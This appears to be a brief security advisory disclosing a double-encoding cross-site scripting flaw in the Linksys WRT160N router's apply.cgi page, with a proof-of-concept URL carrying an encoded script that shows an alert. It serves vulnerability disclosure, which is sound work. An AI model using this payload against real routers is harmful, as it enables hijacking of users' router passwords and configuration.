The Linksys WRT160N wireless router suffers from a double encoding cross site scripting vulnerability.
cea01176afefa34a476ab14a48f194a1e6436428e5abf497b1e8a964f941476b
**********************************************************************
* Linksys WRT160N Wireless Router Double encoding XSS Vulnerability *
* *
* By David Gil *
* *
* http://www.infosec.com.mx *
* *
* dagil@infosec.com.mx *
* *
**********************************************************************
Using Double encoding attack you can inject XSS code into a HTTP POST request
a common user can be easily cheated and compromise router password or router configuration.
Proof of Concept:
http://192.168.1.1/apply.cgi?submit_button=DHCP_Static&action=--%3E%3CScRiPt%20%0A%0D%3Ealert(398343216433)%3B%3C%2FScRiPt%3E&wait_time=0&forward_single=15
Greetz:
Alex Hernandez